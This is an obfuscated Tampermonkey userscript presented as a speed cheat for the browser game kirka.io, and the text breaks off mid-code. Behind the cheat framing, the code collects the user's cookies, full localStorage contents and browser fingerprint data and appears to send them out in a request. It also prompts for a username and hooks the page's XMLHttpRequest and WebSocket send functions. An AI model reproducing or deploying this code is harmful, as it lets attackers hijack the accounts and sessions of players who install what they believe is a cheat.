// ==UserScript==
// @name         Av1 kirka speed hack
// @namespace    http://tampermonkey.net/
// @version      0.1
// @description  press 1 to run cheat
// @author       You
// @match        *://kirka.io/*
// @icon         data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==
// @grant        none
// ==/UserScript==
var _0xd7f303=_0x5174;function _0x1f86(){var _0x443246=['YWrZD','wyxck','Jump?','AlHkr','liAet','=;expires=','url','LLPKB','kIHXB','PJrEG','userAgent','QOjod','wjhTK','1058847rAkQgY','GMBld','9999999999','Bocked\x20Pac','log','sin','CiRkQ','jIWAH','ypTga','function','ed=1000','ePfli','CtEKk','iBXtt','write','CnHWt','z-index:-9','cookie','proxy','ed=','yQFnj','eppAz','cmp_warn','javaEnable','DSKpW','\x20username\x20','push','error','VjUtY','show_','clear','Modulator=','product','FhOCR','FRXgi','fAien','bQWIB','nurvf','open','xKRDq','6xvZZdv','YsFju','4|1|3|2|0','apply','1012320UaLbxC','1233127ckxCps','WPbAy','Shot?\x20','llymo','onmessage','region','rHcXP','delete','zIqbo','set','NUScF','VhaPx','mWnwMWorld','xJtVj',';path=/','IpGCX','Speed_Modu','IGwax','ter','XYaxd','ZGfZj','random','split','Oibcb','BzabR','jsMxu','VJBBb','false','sessionSto','player','cVhLS','4843770KtYgIn','TssmN','Packet','onLine','IlYBy','lhTNy','45qvhCMv','OJQUc','addEventLi','nTFYz','QhGQC','zfaTv','vBUQM','send','XyYEj','getOwnProp','appVersion','pQRBN','GET_SPEED','appCodeNam','GET','defineProp','lator','jDwlP','lator_Succ','appName','TFGCV','tan','wMicb','__sentry_x','dkmLx','GET-SPEED','qNVDh','length','weHam','cket','PtAfG','eRVvX','vGqTj','mFCqv','data','XfCYu','urGpy','QdqLo','UwrHt','stener','PvLmw','StatsSend=','BqkUu','EyrIO','nieeo','language','NydNH','SqJri','cmp_target','gwQCs','setItem','fRPvO','mwxxp','without\x20ID','emqjC','forEach','iHMXy','IatCb','Loaded','keydown','ptors','EUVfD','Holding\x20Pa','NTDhv','LMkpa','NggPw','jUUCJ','Ewqoc','VTcXC','FhVpK','VIFlv','IErLF','XCEoN','okVyW','_TO=','272008DYEJqG','NsylW','led','NeSpG','HchDL','DOMContent','rage','ertyDescri','enter\x20your','446DaKDwP','OIBOz','responseTe','PmajL','prototype','LOUmz','nPzZf','oyYSi','Run?','Damage?','erty','essful','11QXhBju','map','hr__','CONNECTING','no-cache','YEEUs','Boost?','XRWKg','userFromEE','cos','fEvJg','cookieEnab','ket\x20','player_Spe','VrPLR','hblgW','Accelerome','pxvMW','dppSs','AfDjt','key','LstZb','localStora','DxObp','ByBVR','LtMLD','wueyH','1288QjKBme','then','toUTCStrin','stringify','FQfSu','644576gfFJiG','wkeig','eppZk','Jbfir','XOvdK','GEGUd','A=true','replace','wvfTO'];_0x1f86=function(){return _0x443246;};return _0x1f86();}(function(_0x5a9e8d,_0x51f33d){var _0x24d7ab=_0x5174,_0x205c3=_0x5a9e8d();while(!![]){try{var _0x44887d=parseInt(_0x24d7ab(0x105))/(-0x4*-0x41+0x1d1a*-0x1+-0x33*-0x8d)*(-parseInt(_0x24d7ab(0xde))/(-0xafd+-0x2497+0x17cb*0x2))+parseInt(_0x24d7ab(0x120))/(-0x5d*0x3b+-0xb8d*-0x2+-0x4*0x6a)+-parseInt(_0x24d7ab(0x10a))/(0x1253*0x1+-0x5e9+0x1*-0xc66)+-parseInt(_0x24d7ab(0x14c))/(0x2332+0xe75+-0x1*0x31a2)*(-parseInt(_0x24d7ab(0x148))/(-0x144*0xa+0xe*-0x169+0x19f*0x14))+-parseInt(_0x24d7ab(0x14d))/(-0x1346+0x1*0x2411+-0x10c4)+parseInt(_0x24d7ab(0xd5))/(-0x521+-0x19f+0x364*0x2)*(-parseInt(_0x24d7ab(0x172))/(-0x551*-0x1+0x2cf*-0x2+-0x56*-0x1))+parseInt(_0x24d7ab(0x16c))/(0x4a8*-0x7+-0x45*-0x25+0x16a9)*(parseInt(_0x24d7ab(0xea))/(-0x1f63*-0x1+0x13d+-0x2095));if(_0x44887d===_0x51f33d)break;else _0x205c3['push'](_0x205c3['shift']());}catch(_0x21aa34){_0x205c3['push'](_0x205c3['shift']());}}}(_0x1f86,0x167*0x2d7+-0x57829+0x53ab0));var server=_0xd7f303(0x15d)+_0xd7f303(0x182);localStorage[_0xd7f303(0xbc)](_0xd7f303(0x152),server);function Speed_Modulator({PLAYER_SPEED_:_0x14bd23,PLAYER_SPEED__:_0x4a3859,PLAYER_SPEED___:_0x3c9bb1}){};var USERNAME,PASSWORD,TOKEN,ANTI_IPBAN=window[_0xd7f303(0x132)]=!![],BAN_FALSE=function anonymous(){debugger;};function _0x5174(_0x1bbe1c,_0x4e1a88){var _0x4250b9=_0x1f86();return _0x5174=function(_0x5c5f54,_0x4adb58){_0x5c5f54=_0x5c5f54-(-0x2697+-0x1*-0x1b09+0xc3f);var _0x3bf572=_0x4250b9[_0x5c5f54];return _0x3bf572;},_0x5174(_0x1bbe1c,_0x4e1a88);}function Player_Data({PLAYER_USERNAME_:_0x322292=USERNAME,PLAYER_PASSWORD__:_0x27fd27=PASSWORD,PLAYER_TOKEN___:_0x5b1e90=TOKEN,PLAYER_BAN___:_0x55f834=BAN_FALSE}){};function Player_Options({PLAYER_STATS_:_0x24a453,PLAYER_EEA__:_0x2d9e87}){};document[_0xd7f303(0x131)]=_0xd7f303(0xf2)+'A=',document[_0xd7f303(0x131)]=_0xd7f303(0xf2)+_0xd7f303(0x110),document[_0xd7f303(0x131)]=_0xd7f303(0xb3),document[_0xd7f303(0x131)]=_0xd7f303(0xb3)+_0xd7f303(0x168),document[_0xd7f303(0x131)]=_0xd7f303(0xf7)+_0xd7f303(0x133),document[_0xd7f303(0x131)]=_0xd7f303(0xf7)+_0xd7f303(0x12a);var GET_SPEED=console[_0xd7f303(0x124)](_0xd7f303(0x17e));function Speed_Modulator_Injector(_0x1141e7){var _0x22c20c=_0xd7f303,_0x3e204a={'iBXtt':function(_0x2f9c71,_0x3360b5){return _0x2f9c71+_0x3360b5;},'wjhTK':function(_0x16d53c,_0x56ef29){return _0x16d53c+_0x56ef29;},'TFGCV':function(_0x5f279f,_0x43daa7){return _0x5f279f+_0x43daa7;},'nTFYz':function(_0x2cfcf2,_0x38ce4e){return _0x2cfcf2+_0x38ce4e;},'OIBOz':function(_0xb74e66,_0x315dab){return _0xb74e66+_0x315dab;},'EyrIO':function(_0x43601e,_0x4d4d95){return _0x43601e+_0x4d4d95;},'Ewqoc':function(_0x5ef033,_0x5f4bef){return _0x5ef033+_0x5f4bef;},'IlYBy':function(_0x2cf511,_0x4d4367){return _0x2cf511+_0x4d4367;},'wkeig':_0x22c20c(0x13f),'pQRBN':_0x22c20c(0x17e),'gwQCs':function(_0x3408a1,_0x47c529){return _0x3408a1+_0x47c529;},'QhGQC':function(_0x3c4eb0,_0x6226cc){return _0x3c4eb0+_0x6226cc;}},_0x188231=_0x3e204a[_0x22c20c(0x12d)](_0x3e204a[_0x22c20c(0x11f)](_0x3e204a[_0x22c20c(0x186)](_0x3e204a[_0x22c20c(0x12d)](_0x3e204a[_0x22c20c(0x175)](_0x3e204a[_0x22c20c(0x11f)](_0x3e204a[_0x22c20c(0xdf)](_0x3e204a[_0x22c20c(0x175)](_0x3e204a[_0x22c20c(0xb5)](_0x3e204a[_0x22c20c(0x11f)](_0x3e204a[_0x22c20c(0xcd)](_0x3e204a[_0x22c20c(0x170)](_0x3e204a[_0x22c20c(0x186)](_0x3e204a[_0x22c20c(0x10b)],navigator[_0x22c20c(0xb7)]),navigator[_0x22c20c(0x16f)]),navigator[_0x22c20c(0x140)]),navigator[_0x22c20c(0x17c)]),navigator[_0x22c20c(0x11d)]),navigator[_0x22c20c(0x17f)+'e']),navigator[_0x22c20c(0xf5)+_0x22c20c(0xd7)]),navigator[_0x22c20c(0x185)]),document[_0x22c20c(0x131)]),navigator[_0x22c20c(0x137)+'d']),document[_0x22c20c(0x12e)]),window[_0x22c20c(0x169)+_0x22c20c(0xdb)]),JSON[_0x22c20c(0x108)](window[_0x22c20c(0x100)+'ge']));_0x188231[_0x22c20c(0x146)](_0x3e204a[_0x22c20c(0x17d)],_0x1141e7,![]),_0x188231[_0x22c20c(0x179)](_0x3e204a[_0x22c20c(0xbb)](_0x3e204a[_0x22c20c(0x176)](document[_0x22c20c(0x131)],JSON[_0x22c20c(0x108)](window[_0x22c20c(0x100)+'ge'])),window[_0x22c20c(0x169)+_0x22c20c(0xdb)]));}document[_0xd7f303(0x174)+_0xd7f303(0xb1)](_0xd7f303(0xc5),function(_0x5c5734){var _0x5bb416=_0xd7f303,_0x489242={'NggPw':function(_0x5a859a,_0x61bf53){return _0x5a859a<_0x61bf53;},'UwrHt':function(_0x53be37,_0x56e24a){return _0x53be37(_0x56e24a);},'DxObp':function(_0x188d7d,_0x443562){return _0x188d7d+_0x443562;},'okVyW':function(_0x508774,_0x357f16){return _0x508774+_0x357f16;},'IGwax':function(_0x362013,_0x519047){return _0x362013+_0x519047;},'XYaxd':function(_0xd48aad,_0x554319){return _0xd48aad+_0x554319;},'dkmLx':_0x5bb416(0xed)+_0x5bb416(0xd4),'kIHXB':_0x5bb416(0x15d)+_0x5bb416(0x184)+_0x5bb416(0xe9),'llymo':function(_0x1686d1,_0x431e46){return _0x1686d1+_0x431e46;},'zIqbo':function(_0x1c5ee5,_0xd674bd){return _0x1c5ee5/_0xd674bd;},'VhaPx':_0x5bb416(0xc8)+_0x5bb416(0x18f),'jIWAH':function(_0xec19e3,_0x2e82f1){return _0xec19e3 instanceof _0x2e82f1;},'iHMXy':function(_0x29d537,_0x40a11d){return _0x29d537&&_0x40a11d;},'LMkpa':function(_0x2c45ad,_0x50055a){return _0x2c45ad==_0x50055a;},'ypTga':function(_0x1865d8,_0x31165f){return _0x1865d8==_0x31165f;},'wvfTO':_0x5bb416(0xe7),'QdqLo':function(_0x2072ac,_0x4f8295){return _0x2072ac+_0x4f8295;},'jDwlP':function(_0x582fab,_0x1da732){return _0x582fab-_0x1da732;},'FRXgi':_0x5bb416(0x14f),'DSKpW':_0x5bb416(0xe6),'PtAfG':_0x5bb416(0xf0),'IpGCX':_0x5bb416(0x115),'LstZb':_0x5bb416(0x16e),'ZGfZj':function(_0x2144a7,_0x2a0454){return _0x2144a7==_0x2a0454;},'TssmN':_0x5bb416(0x129),'CiRkQ':_0x5bb416(0x151),'wMicb':_0x5bb416(0x18b),'NydNH':_0x5bb416(0x125),'PJrEG':_0x5bb416(0xf3),'vBUQM':_0x5bb416(0x187),'rHcXP':function(_0x194f82){return _0x194f82();},'NsylW':_0x5bb416(0x14a),'dppSs':_0x5bb416(0xda)+_0x5bb416(0xc4),'liAet':_0x5bb416(0x180),'XfCYu':_0x5bb416(0xee),'GMBld':function(_0x3f482b,_0x93124){return _0x3f482b+_0x93124;},'emqjC':function(_0x9cf898,_0x13c9f6){return _0x9cf898+_0x13c9f6;},'SqJri':_0x5bb416(0x118),'fAien':_0x5bb416(0x15b),'VTcXC':function(_0x233dd6,_0x1e4945){return _0x233dd6(_0x1e4945);},'YsFju':_0x5bb416(0xdd)+_0x5bb416(0x139)+_0x5bb416(0xbf),'pxvMW':function(_0x24c4e9,_0x12a5f3,_0x22f145){return _0x24c4e9(_0x12a5f3,_0x22f145);},'ByBVR':function(_0x266311,_0x4a39f3,_0x59dc3d){return _0x266311(_0x4a39f3,_0x59dc3d);}};if(_0x489242[_0x5bb416(0x128)](_0x5c5734[_0x5bb416(0xfe)],'1')){var _0x12728b=_0x489242[_0x5bb416(0xce)](prompt,_0x489242[_0x5bb416(0x149)]);_0x489242[_0x5bb416(0xfb)](setInterval,()=>{var _0x39d317=_0x5bb416;for(var _0x1263ad=-0x138+0x443*0x1+-0x30b;_0x489242[_0x39d317(0xcb)](_0x1263ad,-0x1*-0x64b+0x5b+-0x4e*0x9);_0x1263ad++){_0x489242[_0x39d317(0x198)](requestAnimationFrame,()=>{});}},0x2140+0x1*-0x1aad+-0xb*0x99),_0x489242[_0x5bb416(0xfb)](setInterval,function(){var _0x3ea5ed=_0x5bb416,_0x54a40b={'VrPLR':_0x489242[_0x3ea5ed(0x158)],'zfaTv':function(_0x42e8c6,_0x242a3c){var _0x3a69d2=_0x3ea5ed;return _0x489242[_0x3a69d2(0x127)](_0x42e8c6,_0x242a3c);},'urGpy':function(_0x28805b,_0x8e0fcc){var _0x53094a=_0x3ea5ed;return _0x489242[_0x53094a(0xc2)](_0x28805b,_0x8e0fcc);},'EUVfD':function(_0x231f4c,_0x4b6d02){var _0x4e2676=_0x3ea5ed;return _0x489242[_0x4e2676(0xca)](_0x231f4c,_0x4b6d02);},'FhOCR':function(_0x4df1ed,_0x2f12af){var _0x1d7bd4=_0x3ea5ed;return _0x489242[_0x1d7bd4(0x128)](_0x4df1ed,_0x2f12af);},'XyYEj':function(_0x3dfa3f,_0x48dc7a){var _0xecda19=_0x3ea5ed;return _0x489242[_0xecda19(0x128)](_0x3dfa3f,_0x48dc7a);},'BzabR':function(_0x162ab8,_0x555362){var _0x5bae90=_0x3ea5ed;return _0x489242[_0x5bae90(0xca)](_0x162ab8,_0x555362);},'FQfSu':_0x489242[_0x3ea5ed(0x112)],'eRVvX':function(_0x4486df,_0x4038a2){var _0x3ff58e=_0x3ea5ed;return _0x489242[_0x3ff58e(0x197)](_0x4486df,_0x4038a2);},'BqkUu':function(_0x3f64a6,_0x5c6d1){var _0x58c954=_0x3ea5ed;return _0x489242[_0x58c954(0x183)](_0x3f64a6,_0x5c6d1);},'XCEoN':_0x489242[_0x3ea5ed(0x142)],'jsMxu':_0x489242[_0x3ea5ed(0x138)],'YWrZD':_0x489242[_0x3ea5ed(0x190)],'Jbfir':_0x489242[_0x3ea5ed(0x15c)],'oyYSi':_0x489242[_0x3ea5ed(0xff)],'XRWKg':function(_0x1955e6,_0x45f1c8){var _0x405ff5=_0x3ea5ed;return _0x489242[_0x405ff5(0x161)](_0x1955e6,_0x45f1c8);},'yQFnj':_0x489242[_0x3ea5ed(0x16d)],'NUScF':_0x489242[_0x3ea5ed(0x126)]};XMLHttpRequest[_0x3ea5ed(0xe2)][_0x3ea5ed(0x179)]=function _0x3072f1(_0x29988){var _0x1d58a3=_0x3ea5ed,_0xfa2178={'VIFlv':function(_0x2e563c,_0x21b245){var _0x30370c=_0x5174;return _0x489242[_0x30370c(0x101)](_0x2e563c,_0x21b245);},'Oibcb':function(_0x2bf691,_0xa065ce){var _0x352dbb=_0x5174;return _0x489242[_0x352dbb(0x101)](_0x2bf691,_0xa065ce);},'wueyH':function(_0x3516c5,_0x40e747){var _0x3d7994=_0x5174;return _0x489242[_0x3d7994(0xd3)](_0x3516c5,_0x40e747);},'eppZk':function(_0x145d2a,_0x25fe47){var _0x1c9567=_0x5174;return _0x489242[_0x1c9567(0x101)](_0x145d2a,_0x25fe47);},'AfDjt':function(_0x4359ac,_0x5565bf){var _0x182ec4=_0x5174;return _0x489242[_0x182ec4(0x101)](_0x4359ac,_0x5565bf);},'PmajL':function(_0x566995,_0x5c7187){var _0xb25521=_0x5174;return _0x489242[_0xb25521(0x15e)](_0x566995,_0x5c7187);},'lhTNy':function(_0x204162,_0x2ed526){var _0x1e4bc9=_0x5174;return _0x489242[_0x1e4bc9(0x160)](_0x204162,_0x2ed526);},'GEGUd':function(_0x41d295,_0x44a3c1){var _0xdf5271=_0x5174;return _0x489242[_0xdf5271(0xd3)](_0x41d295,_0x44a3c1);},'xJtVj':_0x489242[_0x1d58a3(0x18a)],'bQWIB':_0x489242[_0x1d58a3(0x11b)],'qNVDh':function(_0x2844d5,_0x1c42ce){var _0x44c793=_0x1d58a3;return _0x489242[_0x44c793(0x150)](_0x2844d5,_0x1c42ce);},'fEvJg':function(_0x4e5060,_0x4faae1){var _0x758f4c=_0x1d58a3;return _0x489242[_0x758f4c(0x155)](_0x4e5060,_0x4faae1);},'xKRDq':function(_0xd3aae1,_0x38bc48){var _0x78dbfa=_0x1d58a3;return _0x489242[_0x78dbfa(0x155)](_0xd3aae1,_0x38bc48);}},_0x4120d9=XMLHttpRequest[_0x1d58a3(0xe2)][_0x1d58a3(0x179)];return function(){var _0x24ebdf=_0x1d58a3;if(this[_0x24ebdf(0x189)+_0x24ebdf(0xec)][_0x24ebdf(0x119)][_0x24ebdf(0x163)]('/')[-0x2466+0xba2+-0x1*-0x18c5]){var _0x22c315=console[_0x24ebdf(0x124)](_0xfa2178[_0x24ebdf(0xd0)](_0xfa2178[_0x24ebdf(0xd0)](_0xfa2178[_0x24ebdf(0x164)](_0xfa2178[_0x24ebdf(0x104)](_0xfa2178[_0x24ebdf(0x164)](_0xfa2178[_0x24ebdf(0x10c)](_0xfa2178[_0x24ebdf(0xfd)](_0xfa2178[_0x24ebdf(0xd0)](_0xfa2178[_0x24ebdf(0xe1)](_0xfa2178[_0x24ebdf(0x171)](_0xfa2178[_0x24ebdf(0x164)](_0xfa2178[_0x24ebdf(0x10f)](_0xfa2178[_0x24ebdf(0xe1)](_0xfa2178[_0x24ebdf(0xfd)](_0xfa2178[_0x24ebdf(0x15a)],navigator[_0x24ebdf(0xb7)]),navigator[_0x24ebdf(0x16f)]),navigator[_0x24ebdf(0x140)]),navigator[_0x24ebdf(0x17c)]),navigator[_0x24ebdf(0x11d)]),navigator[_0x24ebdf(0x17f)+'e']),navigator[_0x24ebdf(0xf5)+_0x24ebdf(0xd7)]),navigator[_0x24ebdf(0x185)]),_0x230b09[_0x24ebdf(0x131)]),navigator[_0x24ebdf(0x137)+'d']),_0x230b09[_0x24ebdf(0x12e)]),window[_0x24ebdf(0x169)+_0x24ebdf(0xdb)]),JSON[_0x24ebdf(0x108)](window[_0x24ebdf(0x100)+'ge'])),_0xfa2178[_0x24ebdf(0x144)])),_0x230b09,_0x3b93be,_0x35dafc,_0x24da89,_0x5a72f4,_0x55f7e7=_0x55f7e7,_0x10e6dc=_0x10e6dc,_0x752b93=_0xfa2178[_0x24ebdf(0x18c)](_0xfa2178[_0x24ebdf(0x10f)](_0xfa2178[_0x24ebdf(0xf4)](_0x752b93,_0x230b09['_'][_0x24ebdf(0x16a)]['_'][_0x24ebdf(0x13d)]`z-index:-999999999999;`),_0x5a72f4),_0xfa2178[_0x24ebdf(0x147)](_0x24ebdf(0x130)+_0x24ebdf(0x122)+'9;',_0x22c315));_0x55f7e7,_0x10e6dc,_0x752b93;}};}(),window[_0x3ea5ed(0xfa)+_0x3ea5ed(0x15f)]=Infinity,console[_0x3ea5ed(0x13b)](_0x489242[_0x3ea5ed(0x188)]),console[_0x3ea5ed(0x13b)](_0x489242[_0x3ea5ed(0x188)]),[_0x489242[_0x3ea5ed(0xb8)],_0x489242[_0x3ea5ed(0x11c)],_0x489242[_0x3ea5ed(0x178)]][_0x3ea5ed(0xeb)](_0x4156c1=>((_0x4510c0,_0x46f6c5)=>{var _0x20c746=_0x3ea5ed,_0x2bdd8f=_0x4510c0[_0x46f6c5];_0x4510c0[_0x46f6c5]=_0xadfa98=>_0x2bdd8f(_0xadfa98)+(Math[_0x20c746(0x162)]()*(0x1f30+0x1*-0x78b+-0x17a5)+(0x70d+-0x55c+0x1*-0x1b1))/+0xc6fa31df9e61c000000000000000000000000000000000000000000000000000;})(Math,_0x4156c1)),[_0x489242[_0x3ea5ed(0xb8)],_0x489242[_0x3ea5ed(0x11c)],_0x489242[_0x3ea5ed(0x178)]][_0x3ea5ed(0xeb)](_0x38a411=>((_0x3ecce5,_0x5153c2)=>{var _0x4e6234=_0x3ea5ed,_0x363cd0=_0x3ecce5[_0x5153c2];_0x3ecce5[_0x5153c2]=_0x30af92=>_0x363cd0(_0x30af92)+(Math[_0x4e6234(0x162)]()*(0xf07*-0x2+0x1*-0x2149+0xeb*0x45)+(-0xc85*-0x3+0x6ee+-0x7*0x65b))/+0xc6fa31df9e61c000000000000000000000000000000000000000000000000000;})(Math,_0x38a411)),[_0x489242[_0x3ea5ed(0xb8)],_0x489242[_0x3ea5ed(0x11c)],_0x489242[_0x3ea5ed(0x178)]][_0x3ea5ed(0xeb)](_0x14d67b=>((_0x109a5f,_0x2c51c8)=>{var _0x53fae8=_0x3ea5ed,_0x2dd226=_0x109a5f[_0x2c51c8];_0x109a5f[_0x2c51c8]=_0x361592=>_0x2dd226(_0x361592)+(Math[_0x53fae8(0x162)]()*(0x111f+0x152b+0x264a*-0x1)+(0xd03+-0x5d1+-0x732))/+0xc6fa31df9e61c000000000000000000000000000000000000000000000000000;})(Math,_0x14d67b)),[_0x489242[_0x3ea5ed(0xb8)],_0x489242[_0x3ea5ed(0x11c)],_0x489242[_0x3ea5ed(0x178)]][_0x3ea5ed(0xeb)](_0x248e6a=>((_0xb1b66d,_0x4311d7)=>{var _0x90d340=_0x3ea5ed,_0x34de0c=_0xb1b66d[_0x4311d7];_0xb1b66d[_0x4311d7]=_0x128f37=>_0x34de0c(_0x128f37)+(Math[_0x90d340(0x162)]()*(-0x7d7+-0x26d9+0x2eb0)+(-0x1f68+-0x1b6f+-0x1*-0x3ad7))/+0xc6fa31df9e61c000000000000000000000000000000000000000000000000000;})(Math,_0x248e6a)),[_0x489242[_0x3ea5ed(0xb8)],_0x489242[_0x3ea5ed(0x11c)],_0x489242[_0x3ea5ed(0x178)]][_0x3ea5ed(0xeb)](_0x13485b=>((_0x47f330,_0x4b16db)=>{var _0x219b67=_0x3ea5ed,_0xe3cdc4=_0x47f330[_0x4b16db];_0x47f330[_0x4b16db]=_0x3601d4=>_0xe3cdc4(_0x3601d4)+(Math[_0x219b67(0x162)]()*(0x3*-0x7f4+0x1*-0x11ea+-0x1*-0x29c6)+(-0xf68+-0x5*0x50d+0x28a9*0x1))/+0xc6fa31df9e61c000000000000000000000000000000000000000000000000000;})(Math,_0x13485b)),[_0x489242[_0x3ea5ed(0xb8)],_0x489242[_0x3ea5ed(0x11c)],_0x489242[_0x3ea5ed(0x178)]][_0x3ea5ed(0xeb)](_0x72ca27=>((_0x3502bb,_0x33c760)=>{var _0x409a36=_0x3ea5ed,_0xa864ad=_0x3502bb[_0x33c760];_0x3502bb[_0x33c760]=_0x5989f6=>_0xa864ad(_0x5989f6)+(Math[_0x409a36(0x162)]()*(0x1a7f+-0x1426+-0x659)+(-0xe4d+-0x19fd+0x284a))/+0xc6fa31df9e61c000000000000000000000000000000000000000000000000000;})(Math,_0x72ca27)),[_0x489242[_0x3ea5ed(0xb8)],_0x489242[_0x3ea5ed(0x11c)],_0x489242[_0x3ea5ed(0x178)]][_0x3ea5ed(0xeb)](_0x6a5217=>((_0x372407,_0x5ba146)=>{var _0x537f49=_0x3ea5ed,_0x8d7b91=_0x372407[_0x5ba146];_0x372407[_0x5ba146]=_0x3038e3=>_0x8d7b91(_0x3038e3)+(Math[_0x537f49(0x162)]()*(0x16f3+0x347*0x9+0x1*-0x3472)+(-0x417*-0x2+0x10c7+-0x1*0x18f5))/+0xc6fa31df9e61c000000000000000000000000000000000000000000000000000;})(Math,_0x6a5217)),[_0x489242[_0x3ea5ed(0xb8)],_0x489242[_0x3ea5ed(0x11c)],_0x489242[_0x3ea5ed(0x178)]][_0x3ea5ed(0xeb)](_0x156051=>((_0x2a10c6,_0x4d03eb)=>{var _0x3be37b=_0x3ea5ed,_0x557944=_0x2a10c6[_0x4d03eb];_0x2a10c6[_0x4d03eb]=_0x513aa2=>_0x557944(_0x513aa2)+(Math[_0x3be37b(0x162)]()*(-0x10c4*-0x1+0x2464+-0x3528)+(-0xd27+0x5*0x5a1+-0xefe))/+0xc6fa31df9e61c000000000000000000000000000000000000000000000000000;})(Math,_0x156051)),[_0x489242[_0x3ea5ed(0xb8)],_0x489242[_0x3ea5ed(0x11c)],_0x489242[_0x3ea5ed(0x178)]][_0x3ea5ed(0xeb)](_0x56d798=>((_0x43812e,_0x5e1682)=>{var _0x51fa8e=_0x3ea5ed,_0x43ad27=_0x43812e[_0x5e1682];_0x43812e[_0x5e1682]=_0x22f0f7=>_0x43ad27(_0x22f0f7)+(Math[_0x51fa8e(0x162)]()*(-0xf43+-0x1d27+-0x3*-0xece)+(-0x3*-0x9f+0x20a*-0x13+0x24e1))/+0xc6fa31df9e61c000000000000000000000000000000000000000000000000000;})(Math,_0x56d798)),[_0x489242[_0x3ea5ed(0xb8)],_0x489242[_0x3ea5ed(0x11c)],_0x489242[_0x3ea5ed(0x178)]][_0x3ea5ed(0xeb)](_0x55e37e=>((_0x10a1d0,_0x3fba65)=>{var _0x160dff=_0x3ea5ed,_0x1c45e1=_0x10a1d0[_0x3fba65];_0x10a1d0[_0x3fba65]=_0xed2e93=>_0x1c45e1(_0xed2e93)+(Math[_0x160dff(0x162)]()*(-0x1*0x917+-0x3f3+0xd0a)+(0x4b*-0x17+0x7f4+0x137*-0x1))/+0xc6fa31df9e61c000000000000000000000000000000000000000000000000000;})(Math,_0x55e37e)),[_0x489242[_0x3ea5ed(0xb8)],_0x489242[_0x3ea5ed(0x11c)],_0x489242[_0x3ea5ed(0x178)]][_0x3ea5ed(0xeb)](_0xf26f60=>((_0x1fd7df,_0x2a0633)=>{var _0x21b65c=_0x3ea5ed,_0x1e94b1=_0x1fd7df[_0x2a0633];_0x1fd7df[_0x2a0633]=_0x46cc2b=>_0x1e94b1(_0x46cc2b)+(Math[_0x21b65c(0x162)]()*(-0x1821+-0x4*0x853+0x396d)+(0x55*-0x7+0x3f7+-0x69*0x4))/+0xc6fa31df9e61c000000000000000000000000000000000000000000000000000;})(Math,_0xf26f60)),[_0x489242[_0x3ea5ed(0xb8)],_0x489242[_0x3ea5ed(0x11c)],_0x489242[_0x3ea5ed(0x178)]][_0x3ea5ed(0xeb)](_0x560b18=>((_0x275e94,_0x495d8b)=>{var _0x4c8cfc=_0x3ea5ed,_0x13d5b2=_0x275e94[_0x495d8b];_0x275e94[_0x495d8b]=_0x266b4a=>_0x13d5b2(_0x266b4a)+(Math[_0x4c8cfc(0x162)]()*(0xe0e*0x1+-0x80b+-0x603)+(0x20db*0x1+0x21ae+-0x4289*0x1))/+0xc6fa31df9e61c000000000000000000000000000000000000000000000000000;})(Math,_0x560b18)),window[_0x3ea5ed(0x159)]=-0x6a2d6c45+-0x4ffbcaaa+0xf5c400ef,window[_0x3ea5ed(0xba)]=_0x12728b,window[_0x3ea5ed(0x136)]=_0x489242[_0x3ea5ed(0x188)],console[_0x3ea5ed(0x13e)]();function _0xd08d03({PLAYERSPEED_:_0x14dd77,PLAYERSPEED__:_0x3ed181,PLAYERSPEED___:_0x46234d}){var _0xf318bc=_0x3ea5ed,_0x2e762c=![],_0x479cc4={},_0x10e5b8=0x1*0x3ac+-0xc68+0x8bc,_0x283a83=[],_0xf50381=WebSocket[_0xf318bc(0xe2)][_0xf318bc(0x179)];WebSocket[_0xf318bc(0xe2)][_0xf318bc(0x179)]=function(){var _0x72db1f=_0xf318bc;_0x2e762c?(_0x46234d&&console[_0x72db1f(0x124)](_0x54a40b[_0x72db1f(0xf8)]),_0x283a83[_0x72db1f(0x13a)]({'this':this,'args':arguments})):_0xf50381[_0x72db1f(0x14b)](this,arguments);};var _0xa301d=Object[_0xf318bc(0x17b)+_0xf318bc(0xdc)+_0xf318bc(0xc6)](WebSocket[_0xf318bc(0xe2)])[_0xf318bc(0x151)][_0xf318bc(0x156)];Object[_0xf318bc(0x181)+_0xf318bc(0xe8)](WebSocket[_0xf318bc(0xe2)],_0x54a40b[_0xf318bc(0x157)],{'set':function(){var _0x146bcb=_0xf318bc,_0x2c112b={'XOvdK':function(_0x483e98,_0x5354c7){var _0x41d266=_0x5174;return _0x54a40b[_0x41d266(0x177)](_0x483e98,_0x5354c7);},'WPbAy':function(_0x48cb40,_0x124b11){var _0x3706d5=_0x5174;return _0x54a40b[_0x3706d5(0x196)](_0x48cb40,_0x124b11);},'nurvf':function(_0x21994a,_0x247b4a){var _0x18cea0=_0x5174;return _0x54a40b[_0x18cea0(0xc7)](_0x21994a,_0x247b4a);},'LLPKB':function(_0x3e3572,_0x415983){var _0x20b0ad=_0x5174;return _0x54a40b[_0x20b0ad(0x141)](_0x3e3572,_0x415983);},'cVhLS':function(_0x455359,_0x4d08c8){var _0x3756d7=_0x5174;return _0x54a40b[_0x3756d7(0x17a)](_0x455359,_0x4d08c8);},'OJQUc':function(_0x1c395c,_0x447d7d){var _0x28c145=_0x5174;return _0x54a40b[_0x28c145(0x165)](_0x1c395c,_0x447d7d);},'mFCqv':_0x54a40b[_0x146bcb(0x109)],'NeSpG':function(_0x1fe87c,_0x5c173d){var _0x4d432b=_0x146bcb;return _0x54a40b[_0x4d432b(0x191)](_0x1fe87c,_0x5c173d);},'eppAz':function(_0xc4da71,_0x5ce0d8){var _0x51660d=_0x146bcb;return _0x54a40b[_0x51660d(0xb4)](_0xc4da71,_0x5ce0d8);},'nPzZf':_0x54a40b[_0x146bcb(0xd2)],'LOUmz':_0x54a40b[_0x146bcb(0x166)],'HchDL':_0x54a40b[_0x146bcb(0x113)],'jUUCJ':_0x54a40b[_0x146bcb(0x10d)],'PvLmw':_0x54a40b[_0x146bcb(0xe5)]},_0x39624a=()=>{};_0x54a40b[_0x146bcb(0xf1)](_0x54a40b[_0x146bcb(0x134)],typeof arguments[-0x2056+0xe5*-0x4+0x11f5*0x2])&&_0x54a40b[_0x146bcb(0xb4)]((_0x39624a=arguments[-0x156b+0x16a7*0x1+-0x13c],arguments[-0x3*-0x243+-0x753+0x45*0x2]=function(){var _0x2dd167=_0x146bcb,_0x22ae77={'QOjod':function(_0x5d5a29,_0x4c1754){var _0x4e2064=_0x5174;return _0x2c112b[_0x4e2064(0x10e)](_0x5d5a29,_0x4c1754);},'weHam':function(_0x290e41,_0x1a5c25){var _0x4160dd=_0x5174;return 